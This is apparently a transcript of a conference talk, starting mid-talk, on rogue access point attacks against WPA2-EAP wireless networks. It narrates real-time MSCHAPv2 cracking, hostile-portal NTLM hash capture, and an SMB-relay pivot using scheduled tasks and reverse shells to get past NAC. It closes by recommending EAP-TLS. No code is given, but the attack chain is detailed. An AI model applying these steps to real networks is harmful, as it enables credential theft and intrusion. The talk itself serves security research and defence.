go through all the steps of the authentication process to the point where you actually have an MSCHAPv2 challenge and response, which you can crack offline to derive RADIUS credentials. Unfortunately, what's going to happen at the very end of that process is that you, as the attacker, as the authentication server, need to then authenticate back with the client and demonstrate to the client that you also know the client's RADIUS password, and if you can't do that, the authentication attempt is going to fail. So this is something that we really need to overcome, because for pretty much any interesting rogue AP attack that you want to do, aside from simply stealing RADIUS credentials, you're going to need

a full association from those clients that are connecting to you. Now there are a couple of ways of doing this. For weak RADIUS creds, there already exists something called Auto Crack 'n Add; this is a technique that was developed by Dominic White and Ian de Villiers in the same talk where they improved KARMA attacks in 2014, and that'll work for weak RADIUS creds. For stronger RADIUS creds, remember that we can crack MSCHAPv2 challenges and responses relatively quickly, so of course you could just crack them offline, come back, and finish the attack once you have valid RADIUS credentials. Let's talk about both of these. So, at the very end

of the MSCHAPv2 authentication process, the victim is going to send a challenge response. By the way, over here is the victim, and over here is hostapd; hostapd is essentially what you use as a RADIUS server whenever you're performing this kind of attack. So the first thing that's going to happen at the very end of the MSCHAPv2 authentication process is that the victim is going to send a challenge response, and that's the thing that you use to crack the RADIUS creds, to your RADIUS server, which is hostapd. hostapd at that point is going to attempt to load the victim's password from this thing called the EAP user

file. The EAP user file is essentially a primitive database that's implemented using a text file that has information about the different users and how they can authenticate, what their passwords are, etcetera. So it's going to attempt to load that password, and then from there it's going to use that password to construct an authentication response that is sent along with the authentication success message to the victim. Of course, if you don't already have the user's password, or password hash, or NT password hash, I should say, you're not going to be able to accurately construct this authentication response, so this part of the process here is going to fail, and the

authentication attempt is going to fail. So the way that you get around this using Auto Crack 'n Add is: the second you receive the challenge response, you actually modify hostapd so that instead of immediately loading the password from the EAP user file, you instead shoot the challenge and response off to a remote cracking rig somewhere, which presumably is equipped to crack these relatively quickly. So you essentially make an API call to your cracking rig; the cracking rig at this point cracks this MSCHAPv2 challenge and response to get an NT password hash, and then you just append that NT password hash or password

to the end of the EAP user file. At that point you continue with the MSCHAPv2 authentication process by loading the newly appended password from the EAP user file, use it to construct the authentication response, and send that with the authentication success message off to the victim. So that can work with weak passwords, and it could take anywhere between a few seconds, or it could take a couple of tries, because it really boils down to: can you crack it in time before this authentication attempt times out? But for relatively weak passwords this should work, you know, within like four or five tries. For stronger passwords, for

stronger RADIUS passwords, you aren't going to be able to do this, because you're not going to crack it in time, but remember that with the divide-and-conquer technique you have a 24-hour maximum on the amount of time if you're using FPGA-based hardware to crack these credentials. So here's a demonstration of how you'd incorporate the Auto Crack 'n Add technique. It looks a lot like what we did before: we first force, and that's going to take a couple of tries, the victim over here to associate with the attacker, to authenticate with the attacker, and you see here this time the victim is being prompted with this

certificate warning, because we've given them an invalid certificate, but we've gotten them to associate with us, and as before, the second they open up IE and HTTP traffic is sent, we're able to redirect that to our SMB server and we get their password hashes that way. So what this gets you is lots and lots of NTLM hashes; you get really similar results to what you get with LLMNR and NBT-NS poisoning. There are a few key advantages here. For one thing, you don't need network access, so you don't have to be on the network in order to do this. The other thing is that you're not limited to just attacking a local subnet; you get

everything that's connected to wireless, so that's pretty important. And most importantly, it's not a passive attack: you're not waiting for broadcasts or a request to appear on a local subnet, you're actually making this happen. So back to our scenario. We can use this technique that we just talked about, the hostile portal, and we could build off of that to do something called an indirect wireless pivot, and that's a way of using rogue AP attacks to bypass port-based access control mechanisms. So we mentioned here that we're stuck on our quarantine VLAN, and we want to get over to this restricted VLAN and be able to access these sensitive resources here, and we have a

victim device that is on the restricted VLAN as well, and we have this NAC that is kind of preventing us from doing that. So the first step we can do is a rogue AP attack. Well, actually, assume that we have two network interfaces: first of all, our first interface has an IP address on this quarantine VLAN; the second interface is free to perform more attacks. So we're going to use the second wireless interface to force this victim device over to our own network that we control, using a rogue AP attack. At this point, the particular rogue AP attack we'd use is a hostile portal attack, and that would

allow us to redirect their HTTP traffic to an SMB share that we control, and as before, we'll demonstrate this, this will allow us to obtain their NTLM hashes, which we can crack offline, right? At this point we continue the attack where we left off; we might have to repeat the step where we get them to connect to us. Once we've cracked their NTLM hashes, at this point we're able to use that access to place a timed payload, like a scheduled task or something like that, on the victim. We then kill our rogue AP; this allows the victim to re-associate with the wireless network that they were on previously. Now this victim, despite

the fact that we've exploited it, is still an authorized device, so the NAC mechanism here moves it to the restricted VLAN. At this point we wait for that scheduled task to execute; that gives us a reverse shell to our interface that's on the quarantine VLAN and allows us to pivot onto the restricted VLAN through the authorized device. So that's a simple indirect wireless pivot, but there's a better way of doing this if you can pull it off. So suppose you have two victim devices and an account that can be used to access both; you could then force both of these devices to associate with you, and as

before, you use the hostile portal to get them to send you NTLM hashes. At this point, though, instead of simply capturing hashes, we're going to relay that authentication attempt using an SMB relay attack from one victim to the other. This will allow you to instantaneously place a timed payload on one of the victims. You let the victims re-associate with the target network; as before, they're moved back to the restricted VLAN because they're still authorized devices, and as before, we wait for the reverse shell. So, a quick demo of what this would look like. We have Leeroy and Jenkins, our victim devices here; Leeroy's in the top right, Jenkins is in the top left. Here we have our

attacker. Has anybody ever used Empire? You again. So we have an Empire instance running here; we're using Empire to manage our payloads. We're going to be using Impacket to do our SMB relay attack, and we're going to be using eaphammer to do our rogue AP attack, and over here we have our legitimate access point that these two victim devices are connected to. I'm going to fast-forward through this. So we have a listener set up, and we also have our SMB relay server running there. So we're going to start our SMB relay server. The first thing we're going to do is pass an initial PowerShell payload to our SMB relay server that's

going to execute when we first perform the SMB relay attack, when they connect to us, and then we're going to start eaphammer here, and then, as before, we're going to send some deauth packets to these two devices to get them to roam from the legitimate access point over to our rogue access point. So we're going to do that really fast, and it's kind of lagging there, but wait for it, there you go. Okay, so that gets us one device associated with us. All right, step two: we want to repeat that with the second victim device, Leeroy. All right, now we have Leeroy associated with us as well. At this point we need to pull

off the SMB relay attack, right? So we're going to first start our SMB... well, actually, we're first going to need to obtain the IP address of one of these devices that's associated with us; it's in the output that we see here. Copy it over to our SMB relay server here, and we're going to paste it in there and start the SMB relay server. Now, for demonstration purposes, we're going to start generating some HTTP traffic on one of these target endpoints. We do that here simply by typing stuff in the browser, like we saw before, and you see some activity there; that's the SMB relay server doing its

thing, performing the SMB relay attack, and what you should see in about 40 seconds or so in Empire is an Empire agent connecting back to our Empire instance, and that will give us our initial shell. And there you go: initial agent from 10.0.0.0 now active. We now interact with that agent, and at this point, if you look here, I'm going to actually fast-forward a bit, as you can see here we now have NT AUTHORITY\SYSTEM privileges on Jenkins, which is this victim right here. So at this point both of these devices are still associated with the rogue access point, but we've used an SMB relay attack to obtain a shell on this guy

right here, on Jenkins. So we're going to use that initial shell to place a scheduled task on Jenkins that is going to connect back to our first interface, which is currently associated with the target network, and it's going to do that after a set period of a few minutes. So we're going to do that really fast, I'm going to kind of speed through that, and at that point we just kill our rogue AP, and you'll notice here on our legitimate AP that the victim devices are re-associating with it. So we've lost our initial shell, but when these devices are no longer directly connected to us,

they're back on the target network, and now we just wait for the scheduled task to execute the payload and connect back to us. So something really interesting happened when I was actually recording this demo video, in that I actually forgot to do the thing in VMware where you connect the virtual network interface to your box, to the attacker machine. So initially what happened is that the timed payload, the amount of that delay, finished, and I was like, okay, so where's the shell? I don't know what's going on here. And then I realized that I'd forgotten to connect the thing, so I was

originally going to re-film this and restart the demo from scratch, but something really interesting happened, which is that it turns out I'd actually set 120 retries on this agent to connect back, so this thing would attempt 120 times to keep connecting back to that listener. So what ended up happening was, and if you can kind of see here, I'm going to get to the point where I reconnect it, and you see here I hit the back button, oh yeah, as soon as I did that I just got the connection anyway. So I thought I'd leave that in there because it was kind of cool, and at this point we actually

have, as soon as I reconnect the USB interface, within seconds I had that reverse connection. I thought I'd leave that in there because it's kind of cool and proves a point about well-written malware and well-written implants, which is that even if you enter a situation where you can't get a reverse connection immediately, you can still write something that just keeps attempting to, in various ways, until it finally connects back to you. So that's an indirect wireless pivot. I mean, the equivalent technique of doing this on a wired network would be simply unplugging an authorized device from a switch or something like that and then

connecting it to a hostile network on which you can attack it, and what this demonstrates is that port-based access controls rely on the assumption that the physical layer can be trusted. In a wireless network, on the other hand, the means through which you can trust the integrity of the physical layer is WPA2-EAP, so if you can't trust your EAP implementation, an attacker can freely control the physical layer using rogue access point attacks. This kind of makes the point of whether NAC works or not kind of moot, because if the attacker can control the physical layer, port-based NAC mechanisms

are actually rendered useless. So what this demonstrates is that port-based NAC mechanisms don't effectively mitigate the risk presented by weak WPA2-EAP implementations, and also it demonstrates that adding port-based NAC mechanisms to a wireless network does not make the use of EAP-TTLS or PEAP any less inappropriate if the network in question is used to grant access to sensitive information. Before we kind of wrap this up, I'm going to make one last pitch, kind of like a plug, for EAP-TLS, which is that it's actually not as bad as it used to be. I mean, you can use Group Policy to

configure 802.1X on clients, and that makes this a lot easier than it used to be, and your best option for rolling out EAP-TLS is to just use a private CA and leverage Active Directory as much as possible to deploy EAP-TLS. If you're dealing with an MDM, or, I'm sorry, if you're dealing with a bring-your-own-device situation, I mean, you can just distribute that server certificate to clients using either an MDM solution or a really streamlined BYOD onboarding solution, and you can actually use Let's Encrypt for that as well, although it's worth mentioning that even the folks at Let's Encrypt have stated this is far

from the best option out there. So just to close this up: just because wireless and wired networks operate similarly at the logical level, and that's on purpose, right, you don't want to have to be able to observe the differences between using Ethernet or a wireless network when you're using the network, because that's kind of why we have that layer of abstraction, but just because these things work similarly at the logical level does not mean they work the same way at the physical level. So as a community we should really question whether it's truly a sound business decision to neglect EAP-TLS in

favor of a more reactive approach that focuses on access control and threat containment. And finally, last but not least, most importantly actually: the needs for convenience and security are often at odds with one another, so maintain a healthy skepticism towards solutions that promise both. And that's it. Thanks.

Any questions? Sure. [inaudible question] Yeah, well, hostapd does actually, which is the RADIUS server that you'd use to perform the attack; as for individual RADIUS implementations, they may not work that way, but I know hostapd uses the EAP user file. [inaudible question] Yeah, so you'd get a prompt, the user would get a prompt. So yeah, well, that's what you're banking on; the problem is that you're placing the burden onto the user to reject that prompt, and with an organization of like 200 to 300 people, I mean, I don't know, man, think about your workplace: do you trust everyone not to click that prompt? What's up?

[inaudible question] True, but that rules out BYOD as well. What's up? [inaudible question] You would need... that's a good question. So for that particular attack, you would need the necessary privileges to, one, be able to access the device in the first place; you'd also have to have at least local admin on that device, because you'd need to be able to do something like create a scheduled task to make it connect back to you in the first place. So you would need some level of administrative access in order to make that work. If you're...

[inaudible question] You could probably automate that using the Empire API. I have not done that, but it can be done. Realistically, though, you'd want to automate it as fast as possible, so I mean, that's doing it over like a few minutes, which is decent, but of course there's room for taking it beyond a proof-of-concept stage and actually making it happen lightning fast; that's ideally what you'd want. Something else that's worth mentioning, though: you know how we used the scheduled task in order to get the reverse shell to execute? Well, that might not always be the best way to do it, because if you're talking about a realistic scenario,

you'd want something that doesn't necessarily touch disk. So a better way to do this would actually be to have something that lives completely in memory and is maybe more event-driven, so it listens for a network change, like, is someone logging in, or am I back on the network? And then it would shoot the reverse shell, which doesn't have to be a reverse shell, back to the first interface. I mean, you could actually just do an outbound connection, or something else: you could just have it autonomously start doing some situational awareness moves. I'm trying to figure out... there are a lot of different ways of doing it, but that's just an easy, straightforward way to

just kind of explain it, so that's kind of why I did it that way. Anything else? Sure.

[inaudible question] If you have certificates on both ends, that mitigates this issue; that's EAP-TLS, so that's how you... The problem is that organizations often tend to balk at the idea of rolling out something like that, unfortunately, but yeah, that's what I'm trying to push for, is using that more. I've seen it twice this past year, which is not great, but actually the first time I saw it this year I was thrilled; I actually went up and shook the guy's hand because I was like, someone's actually doing this, wow. But then again, remember, I work primarily with clients in the finance sector,

like in the Northeast corridor area, so this may be different; if you're working in medical or DoD you might see different statistics. So yeah, that's just my own personal experience with that. Anyone else? No? All right, well, thank you.